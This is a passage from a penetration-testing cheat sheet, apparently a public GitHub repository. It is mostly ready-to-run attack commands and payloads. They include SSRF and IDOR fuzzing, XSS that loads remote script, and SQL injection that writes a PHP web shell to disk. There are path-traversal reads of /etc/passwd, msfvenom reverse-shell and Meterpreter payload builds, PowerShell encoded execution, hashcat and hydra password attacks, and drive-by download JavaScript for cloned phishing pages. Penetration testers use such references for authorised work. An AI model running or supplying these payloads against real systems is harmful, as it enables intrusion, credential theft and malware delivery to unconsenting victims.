subdomains_live_long_2xx.txt\n```\n\n### WFUZZ\n\nFuzz directories:\n\n```fundamental\nwfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u https://somesite.com/WFUZZ -w directory-list-lowercase-2.3-medium.txt\n```\n\nFuzz parameter values:\n\n```fundamental\nwfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u \"https://somesite.com/someapi?someparam=WFUZZ\" -w somewordlist.txt\n\nwfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H \"Content-Type: application/x-www-form-urlencoded\" -u \"https://somesite.com/someapi\" -d \"someparam=WFUZZ\" -w somewordlist.txt\n\nwfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H \"Content-Type: application/json\" -u \"https://somesite.com/someapi\" -d \"{\\\"someparam\\\": \\\"WFUZZ\\\"}\" -w somewordlist.txt\n```\n\nFuzz parameters:\n\n```fundamental\nwfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u \"https://somesite.com/someapi?WFUZZ=somevalue\" -w somewordlist.txt\n\nwfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H \"Content-Type: application/x-www-form-urlencoded\" -u \"https://somesite.com/someapi\" -d \"WFUZZ=somevalue\" -w somewordlist.txt\n\nwfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H \"Content-Type: application/json\" -u \"https://somesite.com/someapi\" -d \"{\\\"WFUZZ\\\": \\\"somevalue\\\"}\" -w somewordlist.txt\n```\n\nAdditional example, internal SSRF fuzzing:\n\n```fundamental\nwfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u \"https://somesite.com/someapi?url=127.0.0.1:WFUZZ\" -w ports.txt\n\nwfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u \"https://somesite.com/someapi?url=WFUZZ:80\" -w ips.txt\n```\n\n| Option | Description |\n| --- | --- |\n| -f | Store results in the output file |\n| -t | Specify the number of concurrent connections (10 default) |\n| -s | Specify time delay between requests (0 default) |\n| -u | Specify a URL for the request |\n| -w | Specify a wordlist file |\n| -X | Specify an HTTP method for the request, i.e., HEAD or FUZZ |\n| -b 
| Specify a cookie for the requests |\n| -d | Use post data |\n| -H | Use header |\n| --hc/--hl/--hw/--hh | Hide responses with the specified code/lines/words/chars |\n| --sc/--sl/--sw/--sh | Show responses with the specified code/lines/words/chars |\n| --ss/--hs | Show/hide responses with the specified regex within the content |\n\n### Insecure Direct Object Reference (IDOR)\n\nFirst, try to simply change one value to another, e.g., change `victim@gmail.com` to `hacker@gmail.com`, change some ID from `1` to `2`, etc.\n\nIt is likely that lower number IDs will relate to some higher privilege accounts or roles.\n\nSecond, try parameter pollution:\n\n```fundamental\n\"email\":\"hacker@gmail.com,victim@gmail.com\"\n\"email\":\"hacker@gmail.com victim@gmail.com\"\n\"email\":\"hacker@gmail.com\",\"email\":\"victim@gmail.com\"\n\"email\":\"victim@gmail.com,hacker@gmail.com\"\n\"email\":\"victim@gmail.com hacker@gmail.com\"\n\"email\":\"victim@gmail.com\",\"email\":\"hacker@gmail.com\"\n\"email\":(\"hacker@gmail.com\",\"victim@gmail.com\")\n\"email\":[\"hacker@gmail.com\",\"victim@gmail.com\"]\n\"email\":{\"hacker@gmail.com\",\"victim@gmail.com\"}\n\"email\":(\"victim@gmail.com\",\"hacker@gmail.com\")\n\"email\":[\"victim@gmail.com\",\"hacker@gmail.com\"]\n\"email\":{\"victim@gmail.com\",\"hacker@gmail.com\"}\nemail=hacker%40gmail.com,victim%40gmail.com\nemail=hacker%40gmail.com%20victim%40gmail.com\nemail=hacker%40gmail.com\u0026email=victim%40gmail.com\nemail[]=hacker%40gmail.com\u0026email[]=victim%40gmail.com\nemail=victim%40gmail.com,hacker%40gmail.com\nemail=victim%40gmail.com%20hacker%40gmail.com\nemail=victim%40gmail.com\u0026email=hacker%40gmail.com\nemail[]=victim%40gmail.com\u0026email[]=hacker%40gmail.com\n```\n\nTo generate the above output, run [idor.py](https://github.com/ivan-sincek/penetration-testing-cheat-sheet/blob/master/scripts/idor.py):\n\n```fundamental\npython3 idor.py -n email -i victim@gmail.com -t hacker@gmail.com\n```\n\n### HTTP Response 
Splitting\n\nAlso known as CRLF injection. CRLF refers to carriage return (`ASCII 13`, `\\r`) and line feed (`ASCII 10`, `\\n`).\n\nWhen URL encoded, `\\r` becomes `%0D` and `\\n` becomes `%0A`.\n\nFixate a session cookie:\n\n```fundamental\nsomesite.com/redirect.asp?origin=somesite.com%0D%0ASet-Cookie:%20ASPSESSION=123456789\n```\n\nOpen redirect:\n\n```fundamental\nsomesite.com/home.php?marketing=winter%0D%0ALocation:%20https%3A%2F%2Fgithub.com\n```\n\nSession fixation and open redirection are two of many techniques used in combination with HTTP response splitting. Search the Internet for more techniques.\n\n### Cross-Site Scripting (XSS)\n\nSimple cross-site scripting (XSS) payloads:\n\n```html\n\u003cscript\u003ealert(1)\u003c/script\u003e\n\n\u003cscript src=\"https://myserver.com/xss.js\"\u003e\u003c/script\u003e\n\n\u003cimg src=\"https://github.com/favicon.ico\" onload=\"alert(1)\"\u003e\n```\n\nHosting JavaScript on [Pastebin](https://pastebin.com) won't work because Pastebin always returns `text/plain` content-type.\n\nFind out more about reflected and stored cross-site scripting (XSS) attacks, as well as cross-site request forgery (XSRF/CSRF) attacks at [ivan-sincek/xss-catcher](https://github.com/ivan-sincek/xss-catcher).\n\nValid emails with embedded XSS:\n\n```html\nuser+(\u003cscript\u003ealert(1)\u003c/script\u003e)@somedomain.com\n\nuser@somedomain(\u003cscript\u003ealert(1)\u003c/script\u003e).com\n\n\"\u003cscript\u003ealert(1)\u003c/script\u003e\"@somedomain.com\n```\n\n### SQL Injection\n\n**The following payloads were tested on a MySQL database. 
Note that MySQL requires a whitespace character between the comment symbol and the next character.**\n\nIf you need to URL encode the whitespace character, use `%20` or `+` instead.\n\nTry to produce database errors by injecting a single-quote, back-slash, double-hyphen, forward-slash, or period.\n\n**Always make sure to properly close the surrounding code.**\n\nRead this OWASP [article](https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF) to learn how to bypass WAF.\n\n---\n\nBoolean-based SQLi:\n\n```fundamental\n' OR 1=1-- \n\n' OR 1=2-- \n```\n\n---\n\nUnion-based SQLi:\n\n```fundamental\n' UNION SELECT 1,2,3,4-- \n\n' UNION SELECT NULL,NULL,NULL,NULL-- \n\n' UNION SELECT 1,concat_ws('|',database(),current_user(),version()),3,4-- \n\n' UNION SELECT 1,concat_ws('|',table_schema,table_name,column_name,data_type,character_maximum_length),3,4 FROM information_schema.columns-- \n\n' UNION SELECT 1,load_file('..\\\\..\\\\apache\\\\conf\\\\httpd.conf'),3,4-- \n```\n\nIf using, e.g., `1,2,3,4` does not work, try using `NULL,NULL,NULL,NULL` respectively.\n\nUse the union-based SQLi only when you are able to use the same communication channel to both launch the attack and gather results.\n\nThe goal is to determine the exact number of columns in the SQL query and to figure out which of them are shown back to the user.\n\nAnother way to determine the exact number of columns is by using, e.g., `' ORDER BY 1-- `, where `1` is the column number used for sorting - incrementing it by one on each try.\n\n---\n\nTime-based SQLi:\n\n```fundamental\n' AND (SELECT 1 FROM (SELECT sleep(2)) test)-- \n\n' AND (SELECT 1 FROM (SELECT CASE user() WHEN 'root@127.0.0.1' THEN sleep(2) ELSE sleep(0) END) test)-- \n\n' AND (SELECT 1 FROM (SELECT CASE substring(current_user(),1,1) WHEN 'r' THEN sleep(2) ELSE sleep(0) END) test)-- \n\n' AND (SELECT CASE substring(password,1,1) WHEN '$' THEN sleep(2) ELSE sleep(0) END FROM users WHERE id = 1)-- \n\n' AND IF(version() LIKE 
'5%',sleep(2),sleep(0))-- \n```\n\nUse the time-based SQLi when you are not able to see the results.\n\n---\n\nCheck for the existence/correctness:\n\n```fundamental\n' AND (SELECT 'exists' FROM users) = 'exists\n\n' AND (SELECT 'exists' FROM users WHERE username = 'administrator') = 'exists\n\n' AND (SELECT 'correct' FROM users WHERE username = 'administrator' AND length(password) \u003c 8 ) = 'correct\n\n' AND (SELECT CASE substring(password,1,1) WHEN '$' THEN to_char(1/0) ELSE 'correct' END FROM users WHERE username = 'administrator') = 'correct\n\n'||(SELECT CASE substring(password,1,1) WHEN '$' THEN to_char(1/0) ELSE '' END FROM users WHERE username = 'administrator')||'\n```\n\n---\n\nInject a [simple PHP web shell](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/web/simple_php_web_shell_get.php) based on HTTP GET request:\n\n```fundamental\n' UNION SELECT '', '', '', '\u003c?php if(isset($_GET[\"command\"])){echo shell_exec($_GET[\"command\"]);} ?\u003e' INTO DUMPFILE '..\\\\..\\\\htdocs\\\\backdoor.php'-- \n\n' UNION SELECT '', '', '', '\u003c?php $p=\"command\";$o=null;if(isset($_SERVER[\"REQUEST_METHOD\"])\u0026\u0026strtolower($_SERVER[\"REQUEST_METHOD\"])===\"get\"\u0026\u0026isset($_GET[$p])\u0026\u0026($_GET[$p]=trim($_GET[$p]))\u0026\u0026strlen($_GET[$p])\u003e0){$o=@shell_exec(\"($_GET[$p]) 2\u003e\u00261\");if($o===false){$o=\"ERROR: The function might be disabled.\";}else{$o=str_replace(\"\u003c\",\"\u0026lt;\",$o);$o=str_replace(\"\u003e\",\"\u0026gt;\",$o);}} ?\u003e\u003c!DOCTYPE html\u003e\u003chtml lang=\"en\"\u003e\u003chead\u003e\u003cmeta charset=\"UTF-8\"\u003e\u003ctitle\u003eSimple PHP Web Shell\u003c/title\u003e\u003cmeta name=\"author\" content=\"Ivan Šincek\"\u003e\u003cmeta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\"\u003e\u003c/head\u003e\u003cbody\u003e\u003cpre\u003e\u003c?php echo $o;unset($o);unset($_GET[$p]); ?\u003e\u003c/pre\u003e\u003c/body\u003e\u003c/html\u003e' INTO DUMPFILE 
'..\\\\..\\\\htdocs\\\\backdoor.php'-- \n```\n\n**To successfully inject a web shell, the current database user must have write permission (e.g., the MySQL `FILE` privilege) and the target directory must be writable by the database server process.**\n\n### sqlmap\n\nInject SQL code into request parameters:\n\n```fundamental\nsqlmap -a -u somesite.com/index.php?username=test\u0026password=test\n\nsqlmap -a -u somesite.com/index.php --data username=test\u0026password=test\n\nsqlmap -a -u somesite.com/index.php --data username=test\u0026password=test -p password\n```\n\n| Option | Description |\n| --- | --- |\n| -u | Target URL |\n| -H | Extra HTTP header |\n| --data | Data string to be sent through POST |\n| --cookie | HTTP Cookie header value |\n| --proxy | Use a proxy to connect to the target URL (\\[protocol://\\]host\\[:port\\]) |\n| -p | Testable parameter(s) |\n| --level | Level of tests to perform (1-5, default: 1) |\n| --risk | Risk of tests to perform (1-3, default: 1) |\n| -a | Retrieve everything |\n| -b | Retrieve DBMS banner |\n| --dump-all | Dump all DBMS databases tables entries |\n| --os-shell | Prompt for an interactive operating system shell |\n| --os-pwn | Prompt for an OOB shell, Meterpreter, or VNC |\n| --sqlmap-shell | Prompt for an interactive sqlmap shell |\n| --wizard | Simple wizard interface for beginner users |\n| --dbms | To do. |\n\n### dotdotpwn\n\nTraverse a path (e.g., `somesite.com/../../../etc/passwd`):\n\n```fundamental\ndotdotpwn -q -m http -S -o windows -f /windows/win.ini -k mci -h somesite.com\n\ndotdotpwn -q -m http -o unix -f /etc/passwd -k root -h somesite.com\n\ndotdotpwn -q -m http-url -o unix -f /etc/hosts -k localhost -u 'https://somesite.com/index.php?file=TRAVERSAL'\n```\n\nTry to prepend a protocol such as `file://`, `gopher://`, `dict://`, `php://`, `jar://`, `ftp://`, `tftp://`, etc., to the file path; e.g., `file://TRAVERSAL`.\n\nCheck some additional directory traversal tips at [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/README.md). 
Credits to the author!\n\n| Option | Description |\n| --- | --- |\n| -m | Module (http, http-url, ftp, tftp payload, stdout) |\n| -h | Hostname |\n| -O | Operating System detection for intelligent fuzzing (nmap) |\n| -o | Operating System type if known (\"windows\", \"unix\", or \"generic\") |\n| -d | Depth of traversals (default: 6) |\n| -f | Specific filename (default: according to OS detected) |\n| -S | Use SSL for HTTP and Payload module (not needed for http-url) |\n| -u | URL with the part to be fuzzed marked as TRAVERSAL |\n| -k | Text pattern to match in the response |\n| -p | Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword |\n| -x | Port to connect (default: HTTP=80; FTP=21; TFTP=69) |\n| -U | Username (default: 'anonymous') |\n| -P | Password (default: 'dot(at)dot.pwn') |\n| -M | HTTP Method to use when using the 'http' module (GET, POST, HEAD, COPY, MOVE, default: GET) |\n| -b | Break after the first vulnerability is found |\n| -C | Continue if no data was received from host |\n\n### Web Shells\n\nFind out more about PHP shells at [ivan-sincek/php-reverse-shell](https://github.com/ivan-sincek/php-reverse-shell).\n\nFind out more about Java/JSP shells at [ivan-sincek/java-reverse-tcp](https://github.com/ivan-sincek/java-reverse-tcp).\n\n### Send a Payload With Python\n\nFind out how to generate a reverse shell payload for Python and send it to the target machine at [ivan-sincek/send-tcp-payload](https://github.com/ivan-sincek/send-tcp-payload).\n\n## 4. 
Post Exploitation\n\n### 4.1 Useful Websites\n\n* [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)\n* [lolbas-project.github.io](https://lolbas-project.github.io)\n* [gtfobins.github.io](https://gtfobins.github.io)\n\n### Generate a Reverse Shell Payload for Windows OS\n\nTo generate a `Base64 encoded payload`, use one of the following MSFvenom commands and modify it to your needs:\n\n```fundamental\nmsfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -b \\x00\\x0a\\x0d\\xff | base64 -w 0 \u003e payload.txt\n\nmsfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -b \\x00\\x0a\\x0d\\xff | base64 -w 0 \u003e payload.txt\n\nmsfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw | base64 -w 0 \u003e payload.txt\n\nmsfvenom --platform windows -a x64 -e x64/xor -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw | base64 -w 0 \u003e payload.txt\n```\n\nTo generate a `binary file`, use one of the following MSFvenom commands and modify it to your needs:\n\n```fundamental\nmsfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -b \\x00\\x0a\\x0d\\xff -o payload.bin\n\nmsfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -b \\x00\\x0a\\x0d\\xff -o payload.bin\n\nmsfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -o payload.bin\n\nmsfvenom --platform windows -a x64 -e x64/xor -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -o payload.bin\n```\n\nTo generate a 
`DLL file`, use one of the following MSFvenom commands and modify it to your needs:\n\n```fundamental\nmsfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f dll -b \\x00\\x0a\\x0d\\xff -o payload.dll\n\nmsfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f dll -b \\x00\\x0a\\x0d\\xff -o payload.dll\n```\n\nTo generate a `standalone executable` file, use one of the following MSFvenom commands and modify it to your needs:\n\n```fundamental\nmsfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f exe -b \\x00\\x0a\\x0d\\xff -o payload.exe\n\nmsfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f exe -b \\x00\\x0a\\x0d\\xff -o payload.exe\n\nmsfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f exe -o payload.exe\n\nmsfvenom --platform windows -a x64 -e x64/xor -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f exe -o payload.exe\n```\n\nTo generate an `MSI file`, use one of the following MSFvenom commands and modify it to your needs:\n\n```fundamental\nmsfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f msi -b \\x00\\x0a\\x0d\\xff -o payload.msi\n\nmsfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f msi -b \\x00\\x0a\\x0d\\xff -o payload.msi\n```\n\nBytecode might not work on the first try due to some other bad characters. 
Trial and error is the key.\n\nSo far there is no easy way to generate a DLL or an MSI file with a stageless Meterpreter shell due to size issues.\n\n### PowerShell Encoded Command\n\nTo generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command:\n\n```pwsh\n[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes([IO.File]::ReadAllText($script)))\n```\n\nTo run the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:\n\n```pwsh\nPowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand $command\n```\n\nTo decode a PowerShell encoded command, run the following PowerShell command:\n\n```pwsh\n[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($command))\n```\n\nFind out more about PowerShell reverse and bind TCP shells at [ivan-sincek/powershell-reverse-tcp](https://github.com/ivan-sincek/powershell-reverse-tcp).\n\n## 5. Password Cracking\n\n**Google a hash before trying to crack it because you might save yourself a lot of time and trouble.**\n\nUse [Google Dorks](#google-dorks), [Chad](#chad), or [FOCA](#foca) to find and download files and, from the files' metadata, collect domain usernames to brute force.\n\n**Keep in mind that you might lock out people's accounts.**\n\nSome web forms have a CAPTCHA challenge and/or a hidden submission token which may prevent you from brute forcing. 
If that is the case, try to submit a request without the CAPTCHA challenge response and submission token.\n\nYou can find a bunch of useful wordlists in [SecLists](#wordlists).\n\n### 5.1 Useful Websites\n\n* [gchq.github.io/CyberChef](https://gchq.github.io/CyberChef)\n* [onlinehashcrack.com](https://www.onlinehashcrack.com)\n* [hashkiller.io/listmanager](https://hashkiller.io/listmanager) - has many other tools\n* [hashes.com/en/decrypt/hash](https://hashes.com/en/decrypt/hash) - has many other tools\n* [crackstation.net](https://crackstation.net)\n* [weakpass.com/wordlist](https://weakpass.com/wordlist) - lots of password dumps\n* [packetstormsecurity.com/Crackers/wordlists](https://packetstormsecurity.com/Crackers/wordlists)\n\n### crunch\n\nGenerate a lower-alpha-numeric wordlist:\n\n```fundamental\ncrunch 4 6 -f /usr/share/crunch/charset.lst lalpha-numeric -o crunch_wordlist.txt\n```\n\nSee the list of all available charsets, or add your own, in `charset.lst` located in the `/usr/share/crunch/` directory.\n\nGenerate all the possible permutations from words:\n\n```fundamental\ncrunch -o crunch_wordlist.txt -p admin 123 \\!\\\"\n\ncrunch -o crunch_wordlist.txt -q words.txt\n```\n\nGenerate all the possible combinations from a charset:\n\n```fundamental\ncrunch 4 6 -o crunch_wordlist.txt -p admin123\\!\\\"\n```\n\n| Option | Description |\n| --- | --- |\n| -d | Limits the number of consecutive characters |\n| -f | Specifies a character set from a file |\n| -i | Inverts the output |\n| -l | When you use the -t option, this option tells crunch which symbols should be treated as literals |\n| -o | Specifies the file to write the output to |\n| -p | Tells crunch to generate/permute words that don't have repeating characters |\n| -q | Tells crunch to read a file and permute what is read |\n| -r | Tells crunch to resume generating words from where it left off, -r only works if you use -o |\n| -s | Specifies a starting string |\n| -t | Specifies a pattern |\n\n| Placeholder | 
Description |\n| --- | --- |\n| \\@ | Lower case characters |\n| \\, | Upper case characters |\n| \\% | Numbers |\n| \\^ | Symbols |\n\n**Unfortunately, there is no placeholder ranging from lowercase-alpha to symbols.**\n\nGenerate all the possible combinations from a placeholder:\n\n```fundamental\ncrunch 10 10 -o crunch_wordlist.txt -t admin%%%^^\n\ncrunch 10 10 -o crunch_wordlist.txt -t admin%%%^^ -d 2% -d 1^\n\ncrunch 10 10 + + 123456 \\!\\\" -o crunch_wordlist.txt -t admin@@%^^\n\ncrunch 10 10 -o crunch_wordlist.txt -t @dmin@@%^^ -l @aaaaaaaaa\n```\n\n### hash-identifier\n\nTo identify a hash type, run the following tool:\n\n```fundamental\nhash-identifier\n```\n\n### Hashcat\n\nBrute force MD5 hashes:\n\n```fundamental\nhashcat -m 0 -a 3 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt\n```\n\nBrute force NetNTLMv1 hashes:\n\n```fundamental\nhashcat -m 5500 -a 3 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt\n```\n\nUse `--session=\u003csession_name\u003e` to save your cracking progress, and continue it later using `--restore`.\n\nContinue a saved cracking session:\n\n```fundamental\nhashcat --session=cracking --restore\n```\n\n| Option | Description |\n| --- | --- |\n| -m | Hash-type, see references below |\n| -a | Attack-mode, see references below |\n| --force | Ignore warnings |\n| --runtime | Abort session after X seconds of runtime |\n| --status | Enable automatic update of the status screen |\n| -o | Define outfile for recovered hash |\n| --show | Show cracked passwords found in potfile |\n| --session | Define specific session name |\n| --restore | Restore session from --session |\n| --restore-file-path | Specific path to restore file |\n| -O | Enable optimized kernels (limits password length) |\n| -1 | User-defined charset ?1 |\n| -2 | User-defined charset ?2 |\n| -3 | User-defined charset ?3 |\n| -4 | User-defined charset ?4 |\n\n**When specifying a user-defined charset, escape `?` with another `?` (i.e., use 
`??` instead of `\\?`).**\n\n| Hash Type | Description |\n| --- | --- |\n| 0 | MD5 |\n| 100 | SHA1 |\n| 1400 | SHA256 |\n| 1700 | SHA512 |\n| 200  | MySQL323 |\n| 300  | MySQL4.1/MySQL5 |\n| 1000 | NTLM |\n| 5500 | NetNTLMv1-VANILLA / NetNTLMv1-ESS |\n| 5600 | NetNTLMv2 |\n| 2500 | WPA/WPA2 |\n| 16800 | WPA-PMKID-PBKDF2 |\n| 16500 | JWT (JSON Web Token) |\n\nFor more hash types, read the manual.\n\n| Attack Mode | Name |\n| --- | --- |\n| 0 | Straight |\n| 1 | Combination |\n| 3 | Brute Force |\n| 6 | Hybrid Wordlist + Mask |\n| 7 | Hybrid Mask + Wordlist |\n| 9 | Association |\n\n| Charset | Description |\n| --- | --- |\n| \\?l | abcdefghijklmnopqrstuvwxyz |\n| \\?u | ABCDEFGHIJKLMNOPQRSTUVWXYZ |\n| \\?d | 0123456789 |\n| \\?s | \\!\\\"\\#\\$\\%\\\u0026\\'\\(\\)\\*\\+\\,\\-\\.\\/\\:\\;\\\u003c\\=\\\u003e\\?\\@\\[\\]\\^\\_\\`\\{\\|\\}\\~ |\n| \\?a | \\?l\\?u\\?d\\?s |\n| \\?b | 0x00 - 0xff |\n\nDictionary attack:\n\n```fundamental\nhashcat -m 100 -a 0 --session=cracking --force --status -O B1B3773A05C0ED0176787A4F1574FF0075F7521E rockyou.txt\n\nhashcat -m 5600 -a 0 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt rockyou.txt\n```\n\nYou can find the `rockyou.txt` wordlist in [SecLists](#wordlists).\n\nBrute force a hash using a placeholder:\n\n```fundamental\nhashcat -m 0 -a 3 --session=cracking --force --status -O cc158fa2f16206c8bd2c750002536211 -1 ?l?u -2 ?d?s ?1?l?l?l?l?l?2?2\n\nhashcat -m 0 -a 3 --session=cracking --force --status -O 85fb9a30572c42b19f36d215722e1780 -1 \\!\\\"\\#\\$\\%\\\u0026\\/\\(\\)\\=??\\* -2 ?d?1 ?u?l?l?l?l?2?2?2\n```\n\n### Cracking the JWT\n\nBrute force attack (`-a 3`, see the attack modes above):\n\n```fundamental\nhashcat -m 16500 -a 3 --session=cracking --force --status -O eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiSm9obiBEb2UifQ.xuEv8qrfXu424LZk8bVgr9MQJUIrp1rHcPyZw_KSsds\n```\n\nYou can also check my JWT cracking tool at [ivan-sincek/jwt-bf](https://github.com/ivan-sincek/jwt-bf).\n\n### Hydra\n\nI prefer to use Burp Suite to brute force web 
forms, and Hydra for other services.\n\nDictionary attack on an HTTP POST login web form:\n\n```fundamental\nhydra -o hydra_results.txt -l admin -P rockyou.txt somesite.com http-post-form '/login.php:username=^USER^\u0026password=^PASS^\u0026Login=Login:Login failed!'\n```\n\nWhen brute forcing a login web form, you must specify `Login=Login:\u003cexpected_message\u003e` to distinguish between successful and failed login attempts. Change the `username` and `password` request parameter names as necessary.\n\nDictionary attack on a Secure Shell (SSH) login:\n\n```fundamental\nhydra -o hydra_results.txt -L users.txt -P rockyou.txt 192.168.8.5 ssh\n```\n\nYou can find a bunch of useful wordlists in [SecLists](#wordlists).\n\n| Option | Description |\n| --- | --- |\n| -R | Restore a previous aborted/crashed session |\n| -S | Perform an SSL connect |\n| -O | Use old SSL v2 and v3 |\n| -s | If the service is on a different default port, define it here |\n| -l | Login with a login name |\n| -L | Load several logins from a file |\n| -p | Login with a password |\n| -P | Load several passwords from a file |\n| -x | Password brute force generation (MIN:MAX:CHARSET), type \"-x -h\" to get help |\n| -y | Disable use of symbols in bruteforce |\n| -e | Try \"n\" null password, \"s\" login as pass and/or \"r\" reversed login |\n| -o | Write found login/password pairs to a file instead of stdout |\n| -f/-F | Exit when a login/pass pair is found (-f per host, -F global) |\n| -M | List of servers to attack, one entry per line, ':' to specify port |\n\n| Supported Services |\n| --- |\n| ftp\\[s\\] |\n| http\\[s\\]\\-\\{get\\|post\\}\\-form |\n| mysql |\n| smb |\n| smtp\\[s\\] |\n| snmp |\n| ssh |\n| telnet\\[s\\] |\n| vnc |\n\nFor more supported services, read the manual.\n\n| Brute Force Syntax | Description |\n| --- | --- |\n| MIN | Minimum number of characters in the password |\n| MAX | Maximum number of characters in the password |\n| CHARSET | Charset values are: \"a\" for 
lowercase letters, \"A\" for uppercase letters, \"1\" for numbers, and for all others, just add their real representation |\n\nBrute force attack on FTP:\n\n```fundamental\nhydra -o hydra_results.txt -l admin -x 4:4:aA1\\!\\\"\\#\\$\\% 192.168.8.5 ftp\n```\n\n### Password Spraying\n\nAfter you have collected enough usernames from the [reconnaissance phase](#1-reconnaissance), it is time to try and brute force some of them.\n\nFind out how to generate a good password spraying wordlist at [ivan-sincek/wordlist-extender](https://github.com/ivan-sincek/wordlist-extender), but first you will need a few good keywords that describe your target.\n\nSuch keywords can include a company name, abbreviations, or words that describe the company's services, products, etc.\n\nAfter you have generated the wordlist, use it with tools such as [Hydra](#hydra), [Burp Suite Intruder](https://portswigger.net/burp/documentation/desktop/tools/intruder), etc., to brute force login web forms. Hydra can attack authentication mechanisms for all kinds of services and ports.\n\nIf a strong password policy is enforced, lazy passwords usually start with one capitalized word followed by a few digits and one special character at the end (e.g., Password123!).\n\nYou can also use the generated wordlist with [hashcat](#hashcat), e.g., to crack NTLMv2 hashes that you have collected using an LLMNR responder during a network penetration test, etc.\n\n## 6. 
Social Engineering\n\nFind out how to embed a PowerShell script into an MS Word document at [ivan-sincek/powershell-reverse-tcp](https://github.com/ivan-sincek/powershell-reverse-tcp#ms-word).\n\n### Drive-by Download\n\nTo force users to download a malicious file, copy and paste this JavaScript code block on any cloned web page:\n\n```javascript\nfunction download(url, type, name, method) {\n\tvar req = new XMLHttpRequest();\n\treq.open(method, url, true);\n\treq.responseType = 'blob';\n\treq.onload = function() {\n\t\tvar blob = new Blob([req.response], { type: type })\n\t\tvar isIE = false || !!document.documentMode;\n\t\tif (isIE) {\n\t\t\t// IE doesn't allow using a blob object directly as link\n\t\t\t// instead it is necessary to use msSaveOrOpenBlob()\n\t\t\tif (window.navigator \u0026\u0026 window.navigator.msSaveOrOpenBlob) {\n\t\t\t\twindow.navigator.msSaveOrOpenBlob(blob, name);\n\t\t\t}\n\t\t} else {\n\t\t\tvar anchor = document.createElement('a');\n\t\t\tanchor.href = window.URL.createObjectURL(blob);\n\t\t\tanchor.download = name;\n\t\t\tanchor.click();\n\t\t\t// in Firefox it is necessary to delay revoking the ObjectURL\n\t\t\tsetTimeout(function() {\n\t\t\t\twindow.URL.revokeObjectURL(anchor);\n\t\t\t\tanchor.remove();\n\t\t\t}, 250);\n\t\t}\n\t};\n\treq.send();\n}\n// specify your file here, use only an absolute URL\ndownload('http://localhost/files/pentest.pdf', 'application/pdf', 'pentest.pdf', 'GET');\n// download('http://localhost/files/pentest.docx', 'plain/txt', 'pentest.docx', 'GET');\n```\n\nTo try it out, copy all the content from [\\\\social_engineering\\\\driveby_download\\\\](https://github.com/ivan-sincek/penetration-testing-cheat-sheet/tree/master/social_engineering/driveby_download) to your server's web root directory (e.g., to \\\\xampp\\\\htdocs\\\\ on XAMPP), and navigate to the web page with your preferred web browser.\n\n### Phishing Website\n\nTo try it out, copy all the content from 
